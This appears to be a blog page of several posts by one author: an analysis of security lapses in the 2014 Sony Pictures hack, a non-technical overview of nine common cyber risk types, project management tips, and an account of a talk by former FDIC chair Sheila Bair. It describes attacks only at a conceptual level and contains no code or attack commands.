Lessons Learned From the Sony Hack

sony-hack-photo-3This article reviews the 2014 Sony hack from a strengths and weaknesses standpoint based on select parts of the SysAdmin, Audit, Network and Security (SANS) and National Institute of Standards in Technology (NIST) frameworks. Although an older hack the lessons learned here a still relevant today.

Strengths – A Track Record of Innovation and Multilayered Information Security:
From early boom-boxes in the 1980s to the first portable disc player in the early 1990s.  To high-quality headphones, the first HD TVs, to high-quality speakers, a gaming system revolution called the PlayStation, and now a massive on-line gaming network, Sony has been creative and innovative.  This has made them one of the most respected and profitable Japanese companies to date.  Yet this success derived overconfidence in other areas including information security but they still have the potential and the money to be a security leader.   The managerial layering of Sony’s information security team was a good start even if their head count was too low.  One source stated, “Three information security analysts are overseen by three managers, three directors, one executive director and one senior vice president” (Hill, 2014).  Although contradictory, at least there was some oversight.

Failure 1 – Poor Culture and Lack of Leadership Support:
Sony’s leadership is on the record as not respecting the recommendations of either internal or external auditors.  A quote from an I.T. risk consultancy summarized it this way, “The Executive Director of Information Security talked auditors out of reporting failures related to Access Controls which would have resulted in Sony being SOX (Sarbanes-Oxley) non-compliant in 2005” (Risk3sixty LLC, 2014).  Things like this trickle down the layers of management and become a part of the company culture.  Specifically, low level whistle blowers were silenced even though their I.T. risk arguments were solid.  “Sony’s own employees complained that the network security was a joke. (Risk3sixty LLC, 2014)”.  When this happened Sony’s leaders failed to execute their fiduciary duty to the board, shareholders, and customers.  They did this so they did not look bad in the short term yet it cost the company more in the long term.

Failure 2 – Not Understanding Their Baseline:
The baseline is a measure that determines when you have the right amount of security and security process in relationship to your required business objectives and risk tolerance.  Being below the baseline means risk is too high and an attack or breach is likely.  This is why the baseline changes often and needs to be closely monitored.  For example, when you are producing a very politically controversial movie about an unruly world leader who has a history of making war threats against his political opponents, you should have a higher baseline to be on guard from hacktivists.  Sony overly focused on their cash generating core competencies and security was at most an afterthought.  According to one source, Sony Pictures had just 11 people assigned to a top-heavy information security team out of 7,000 total employees (Hill, 2014).  For a technology company that is way too few people working in security.  It’s not enough people to collect and intelligently review logs, patch software, pen test, red team, and be available for one or more war room type projects which are bound to come up – all things prudent security would require.

Understanding your I.T. risk baseline requires testing and measurement and this has to be based on some framework, SANS, NIST, or some of the others.  One former employee described Sony’s failure to comply with any framework as follows, “The real problem lies in the fact that there was no real investment in or real understanding of what information security is.  One issue made evident by the leak is that sensitive files on the Sony Pictures network were not encrypted internally or password-protected” (Hill, 2014).  Had they conformed to the SANS or NIST framework they would have been required to encrypt the data – see conclusion.

Failure 3 – Weak Password Policies:
Sony’s password policy was embarrassingly weak.  In fact, so weak you might think they were deliberately trying to help hackers.  “Employees kept plaintext passwords in Microsoft Word documents” (Franceschi-Bicchierai, 2014).  Even very small companies from the 1990s would have policies against that.  Moreover, one source confirmed that the word files were named with password in the file name (Risk3sixty LLC, 2014).  Once in the network, all a hacker has to do is search for a file with password in the name and they have it.

Failure 4 – Late Detecting the Hack and Data Exfiltration:
Right away the intruders easily walked into Sony’s internal network and began stealing unencrypted sensitive data with apparently no log alarms going off.  Sony had not followed data classification, retention, or governance plans – not even checkbox compliance.  If they did they would not have had all types of data mixed together.  One reporter described it this way, “Intruders got access to movie budgets, salary information, Social Security numbers, health care files, unreleased films, and more” (Hill, 2014).  Thus, their network segmentation here must have been weak or non-existent.  Health care data should not be near unreleased film files as they are totally different.  There is no business justification for this.  Segmenting and encrypting the data would have greatly reduced and delayed any data theft.

Conclusion:
sans-top-3-sony
nist-cyber-sec-framework-for-sony

References:
Baker, L., & Finkle, J.  “Sony PlayStation suffers massive data breach”.  Reuters.  Published 04/26/11.  Viewed 10/26/16.  http://www.reuters.com/article/2011/04/26/us-sonystoldendata-idUSTRE73P6WB20110426

Franceschi-Bicchierai, Lorenzo.  “Don’t believe the hype: Sony hack not ‘unprecedented,’ experts say.”  Mashable.  Published 12/08/14.  Viewed 10/20/16.  http://mashable.com/2014/12/08/sony-hack-unprecedented-undetectable/#359BD06aEkq6

Greene, Tim.  “SANS: 20 critical security controls you need to add.” Networked world.  Published 10/13/15.  Viewed 10/23/16.  http://www.networkworld.com/article/2992503/security/sans-20-critical-security-controls-you-need-to-add.html

Hill, Kashmir.  “Sony Pictures hack was a long time coming, say former employees”.  Published 12/04/14.  Viewed 10/20/16.  http://fusion.net/story/31469/sony-pictures-hack-was-a-long-time-coming-say-former-employees/

NIST.  “Framework for Improving Critical Infrastructure Cyber Security”.  Published 01/01/2016.  Viewed 10/23/16. https://www.nist.gov/sites/default/files/documents/cyberframework/Cybersecurity-Framework-for-FCSM-Jan-2016.pdf Risk3sixty LLC.

Risk3sixty. “The Sony Hack – Security Failures and Solutions.”  Published 12/19/14.  Viewed 10/20/16. http://www.risk3sixty.com/2014/12/19/the-sony-hack-security-failures-and-solutions/

Sanchez, Gabriel.  “Case Study: Critical Controls that Sony Should Have Implemented”.  SANS Institute Information security Reading Room.  Published 06/01/2015.  Viewed 10/20/16.  https://www.sans.org/reading-room/whitepapers/casestudies/case-study-critical-controls-sony-implemented-36022

Demystifying 9 Common Types of Cyber Risk

1)       Crimeware
This is designed to fraudulently obtain financial gain from either the affected user or third parties by emptying bank accounts, or trading confidential data, etc. Crimeware most often starts with advanced social engineering which results in disclosed info that leads to the crimeware being installed via programs that run on botnets which are zombie computers in distant places used to hide the fraudsters I.P (internet protocol) trail. Usually the victim does not know they have crimeware on their computer until they start to see weird bank charges or the like, or an I.T. professional points it out to them. Often times it masquerades as fake but real looking antivirus software demanding your credit card info in an effort to then commit fraud with that info.

2)       Cyber-Espionage
The term generally refers to the deployment of viruses that clandestinely observe or destroy data in the computer systems of government agencies and large enterprises – unauthorized spying by computer, tablet, or phone. Antivirus maker Symantec described one noteworthy example where the U.S. Gov’t made a worm to disable Iran’s nuclear reactors arguably in the name of international security (Fig. 1).

“Stuxnet is a computer worm that targets industrial control systems that are used to monitor and control large scale industrial facilities like power plants, dams, waste processing systems and similar operations. It allows the attackers to take control of these systems without the operators knowing. This is the first attack we’ve seen that allows hackers to manipulate real-world equipment, which makes it very dangerous. It’s like nothing we’ve seen before – both in what it does, and how it came to exist. It is the first computer virus to be able to wreak havoc in the physical world. It is sophisticated, well-funded, and there are not many groups that could pull this kind of threat off. It is also the first cyberattack we’ve seen specifically targeting industrial control systems” (Accessed 03/20/16, Norton Stuxnet Review).

Richard Clarke is the former National Coordinator for Security, Infrastructure Protection and Counter-terrorism for the United States and he commentated on Stuxnet and cyber war generally in this Economist Interview from 2013.

Fig.1.

3)       Denial of Service (DoS) Attacks
A DoS attack attempts to deny legitimate users access to a particular resource by exploiting bugs in a specific operating system or vulnerabilities in the TCP/IP implementation (internet protocols) via a botnet of zombie computers in remote areas (Fig. 2). This allows one host (usually a server or router) to send a flood of network traffic to another host (Fig. 3.). By flooding the network connection, the target machine is unable to process legitimate requests for data. Thus the targeted computers may crash or disconnect from the internet from resource exhaustion – consuming all bandwidth or disk space, etc (Fig. 3.). In some cases they are not very harmful, because once you restart the crashed computer everything is on track again; in other cases they can be disasters, especially when you run a corporate network or ISP (internet service provider).
Fig. 2.                                                                Fig. 3.Botnet and TCP image
4)      
Insider and Privilege Misuse
Server administrators, network engineers, outsourced cloud workers, developers, I.T. security workers, and database administrators  are given privileges to access many or all aspects of a company’s IT infrastructure. Companies need these privileged users because they understand source code, technical architecture, file systems and other assets that allow them to upgrade and maintain the systems; yet this presents a potential security risk.

With the ability to easily get around controls that restrict other non-privileged users they sometimes abuse what should be temporary access privileges to perform tasks. This can put customer data, corporate trade secrets, and unreleased product info at risk. Savvy companies implement multi-layered approvals, advanced usage monitoring,  2 or 3 step authentication, and a strict need to know policy with an intelligible oversight process.

5)       Miscellaneous Errors
This is basically an employee or customer doing something stupid and unintentional that results in a partial or full security breach of an information asset. This does not include lost devices as that is grouped with theft – this is a smaller category. The 2014 Verizon Enterprise Data Breach Investigation Report gives an example of this category as follows:

“Misdelivery (sending paper documents or emails to the wrong recipient) is the most frequently seen error resulting in data disclosure. One of the more common examples is a mass mailing where the documents and envelopes are out of sync (off-by-one) and sensitive documents are sent to the wrong recipient” (Accessed 02/21/16, Page 29).

6)       Payment Card Skimmers
This is a method where thieves steal your credit card information at the card terminals, often at bars, restaurants, gas stations, sometimes at bank ATMs, and especially where there is low light, no cameras, or anything to discourage the criminal from tampering with the card terminal.

Corrupt employees can have a skimmer stashed out of sight or crooks can install hidden skimmers on a gas pump. Skimmers are small devices that can scan and save credit card data from the magnetic stripe (Fig. 4.). After the card slides through the skimmer, the data is saved, and the crooks usually then sell the information through the internet or if they really want to be secure the Darknet which is a secure non-mainstream internet that requires a special browser or plug-in to access. After this counterfeit cards are made, then bogus charges show up, and the bank eats the costs which unfortunately drives up the cost of banking for everyone else. Also, some skimmers have mini cameras which record the pin numbers typed at ATM machines for a more aggressive type of fraud (Fig. 5.).  Here are two images of skimmer technologies:

Fig 4.                                                                       Fig 5.
Card Skimmer and Camera

7)       Physical Theft and Loss
This includes armed robbery, theft by accident, and/or any type of device or data lost.  Although some of the stolen or lost items may never end up breached or used for fraud sometime they are depending on what device and/or what data is on that device and/or if it was encrypted or not, or if it the data could be deleted remotely, etc.

8)       Point of Sale Intrusions
See my 2014 post on the Target Data Breach here for a good example.

9)       Web App Attacks
These incidents were carried out primarily via manipulation of vulnerabilities in input validation and authentication affecting common content management systems like Joomla, Magento, SiteCore, WordPress, and Drupal.

According to the 2015 Verizon Data Breach Investigation Report these types of attacks are not only a reliable method for hackers, but also fast with 60% of the compromises taking a few minutes or less(Accessed 02/21/16). With web applications commonly serving as an organization’s public face to the Internet, the ease of exploiting web-based vulnerabilities is alarming (Accessed 02/21/16, 2015 Verizon Data Breach Investigation Report). According to The Open Web Application Security Project these are two common types Web App weaknesses (Accessed 02/21/16, 2013, OWASP 10 Most Critical Web Application Security Risks):

“i) Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

ii) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping (Fig. 6.). XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites access unauthorized pages”.

Fig. 6.
RXSS
Jeremy Swenson, MBA is a seasoned, Intel certified, retail technology marketing and training representatives on assignment at Best Buy for clients including Intel, Trend Micro, Adobe, and others. He also doubles as a Sr. business analyst and project management consultant. Tweet to him @jer_Swenson.

 

Four PMBOK Inspired Tips For Success On Complicated Projects

imagesCMHQ1JHK1) Stakeholder Management: Attain clear support from the executive stakeholders from the beginning of the project and schedule regular check-in meetings with them ahead of time as they tend to be very busy and are often pulled in many directions.  Set the tone that their participation is needed and that they will need to approve change requests which is not uncommon.  You should also use clever people skills and empathetic listening skills as you interview the many high-level stakeholders in the early part of the project so as to diffuse conflict and get consensus on disagreements about scope, business goals, order, and to find out who will be the thorn in your back as the sooner you know that the better.  Also, accept that stakeholders will be different and they may not even directly work for your company which is ok as those ones tend to offer specialized expertise and are often very creative.

2) Communications Management: It’s common to have one or two stakeholders who are difficult, protesting the project through their actions, or who are otherwise egotistical, and/or just plain difficult to deal with.  As a project manager, project consultant, or business analyst, it is your responsibility to deal with these people and situations.  One way to do this is to understand the communication styles of all project stakeholders early on in the project and document this.  Strength Finders, DISC, and many other communication style tests can help with this or you could consult a person who has a lot of international travel experience – they are often helpful understanding group communication dynamics.  You should also know when to be direct, indirect, and/or silent in your communications.  Communication is mostly about listening and perception and as project manager you are not the direct boss of the project team members so your ability to drive tasks is heavily based on your communication and motivational skills – so ask all team members what you can do to clear their roads either yourself or in partnership with other stakeholders.  This reduces surprise road blocks down the road and encourages silent people to speak up.

Project Mgmt3) Quality Management: Having worked on many complex projects in highly regulated industries over the last 5 years I have noticed a shift towards agile methodologies vs. waterfall.  From my perspective this is really about quality and timely flexibility.  Aligning the project tasks in small pieces allows you to test the results independently and faster, and if the results are bad that’s a good thing because it’s just one piece of the project and you can learn from it – getting an early warning.  Yet to get better quality out of an error you need to have documented what went into the error from beginning to end and you need intelligent consensus.  On SDLC projects there will be many small errors which then raise questions about other systems and how they relate to the business rules.  Yet with good process flows, screen shots, and JAD sessions with key people, you can ensure that these errors are nothing more than normal bumps in the road.  Every project has its bumps but the real test is having above average quality on budget and on time at the projects end thus creating a reusable plan others can learn and be inspired from.

imagesRIPQVZGS4) Risk Management: In this new era where almost everything is in the cloud and hackers are targeting large and mid-sized companies to steal and sell their data, every risk analysis document/plan should take into consideration data security, customer privacy, access controls from the project team, and there should be an independent audit plan – often out of scope of the project and done by a different group for checks and balances.  No project has no data so data is always a part of a project, sometimes more and sometimes less.  Question number one is who should have access to the data and at what point?  In today’s environment you should embrace a need to know policy and you should document that to reduce risks.  You should also imagine a worst case scenario and be prepared for it and run this by the executive project sponsors, and/or risk officer if your company has one.

Another common risk is project delay.  Have you analyzed how a one or two month delay would affect your critical path and logical task order?  For some projects it may not matter and for others it may cost your project millions more.  It may harm another dept. or a related project thus in your project risk document you should list the longest delay your project could handle and the dependencies of that delay.  Delays on projects, especially SDLC projects, do happen and are not necessarily bad and they can be dealt with but your project team needs to be ready for it and the sooner they know the better.

If you want to hire me to speak at your next event or consult for your company on these and related topics concerning project risk, process improvement, project management, and related areas please contact me.

Former FDIC Chair Shelia Bair Comments On Bank Bailouts, Peer-To-Peer Lending, And Tax Reform

On Tues, 04/08/14, former FDIC Chairperson Shelia Bair visited Minneapolis and offered commentary on the financial services industry, peer-to-peer lending, systemic risk, and the recent recession.  Bair is educated as an attorney and was Assistant Secretary for Financial Institutions at the Treasury Dept. and a professor at the University of Massachusetts Amherst before she moved over to Chair the FDIC from 2006 to 2011.  At the FDIC Bair helped the nation’s financial system out of an exacerbated recession and unprecedented bank run from 2007 to 2010 but not without ruffling a few feathers.

Addressing a sold out crowd including former Congressman Tim Penny and other elected officials, business people, students, and ethically minded community members, Bair had the honor of being the keynote speaker at Saint Mary’s University of MN’s publically broadcasted Hendrickson Forum on Ethical Leadership.  Bair opened her keynote by describing how unimpressed she was that when she arrived at the FDIC in 2006 the organization had little to no info on sub-prime lending and had to buy a database to conduct research on it.  This was in part due to the fact that sub-prime lenders were private and not a part of deposit institutions and thus slightly out of scope for the FDIC at that time.  Bair did not inherit a perfect FDIC, and it can be inferred that the FDIC should have been paying attention to sub-prime lending far sooner as it was directly related to many elements that affect deposit institutions including real estate, entrepreneurship, income and tax, and community redevelopment.

Image

Bair now free from the constraints of holding a Washington office spoke openly about how she felt hindered to speak to the human element of the financial crisis while at the FDIC.  She indicated that although she was a part of the team that brokered the historic bank bailouts (2008-2009), that she has some serious reservations about that, because it was “too generous and uneven” and “helped the banks far more than it helped homeowners and families”.  She also described regular disagreement with then Treasury Secretary Timothy Geithner and suggested he was too close to many of the bank executives who benefited from the bank bailouts.

She further described miscommunication and lack of collaboration as Geithner worked around her efforts at the FDIC, and the undertone of this was political disagreement over which agency should lead the recession resolution in terms of the banking industry.

At present, Bair supports the Dodd-Frank Act because it favors bankruptcy and a three-year claw back for executives over a bailout in the event of a bank failure.  Although Bair in the past has said she disagreed with Janet Yellen’s support to repeal the Glass-Steagall Act, she presently indicated she still supports the new Fed Chair and viewed her as a reliable Washington outsider.

Image

When I directly questioned Bair on the growth of peer-to-peer lending she seemed cautious about its long-term viability citing an unknown regulatory landscape and even recounted that peer-to-peer lender Prosper lost many investors during the worst months of the recession.  In discussion with Bair I observed that she, like many banks, is in a wait and see mode with peer-to peer-lending, but she did indicate that for customers consolidating higher interest rate debt it can be a good thing and that could in turn force banks to be more customer centric with better terms.

Yet I am more optimistic on peer-to-peer lending than Bair in partnership with many respected peer-to-peer investors including Google who invested $125 million in Lending Club and the former CEO of Citi Group, Vikram Pandit.  It is really telling when the former Citigroup CEO goes against his own industry in favor of a tech-heavy new lending model, but he is right because most customers no longer need the big bank branches and elaborate services that are fee heavy.  Moreover, peer-to-peer lenders offer attractive rates, diverse portfolio options, and low operational costs and that keeps investors and borrowers happy.  Just like online news slaughtered traditional print media, as soon as peer-to-peer lending gets more regulatory backing it will slaughter traditional fee-heavy banks if they don’t adapt to this new environment.

When commenting on federal sequestration Bair showed frustration and disagreement over the automatic spending cut approach and instead suggested that tax rates be reduced and restructured in a number of areas to encourage more employment, keep businesses in the U.S., and encourage business innovation which would in turn provide more income and employment thus bringing in a greater amount of taxable income to offset her proposed tax reduction.  This truly can be a helpful aspect of the budget deficit issue in that taxes in the U.S. are far too high and there are some needless loopholes that harm many and help few.  The 2.3% Medical Device Tax is an example of this as it encourages the many medical device companies in MN to move their operations outside the U.S. due to the high tax cost, and it adds to their cost of doing business thus reducing their ability to get favorable loans.

Lastly, as an advocate for consumer protection and creative thinking I asked Bair if she had any insight on what the massive Target data breach might mean for the banking and related industries — where an estimated 10-15% of the 40 million affected cards have encountered some type of fraud — and she reminded me that the banks are taking the losses before the retailer does.  Although she offered no specifics other than suggesting that debit cards are more relevant, she shared my concern that data security is a growing factor in financial regulation yet I was then reminded that Bair is more of a politician and economist than a technologist.  Yet from an economic policy standpoint if the nation encounters more data breaches like this it could drive the cost of goods up thus forcing more costly and secure card payment products perhaps with biometrics on them.

Photos by Rick Busch.

Written by Jeremy Swenson (c)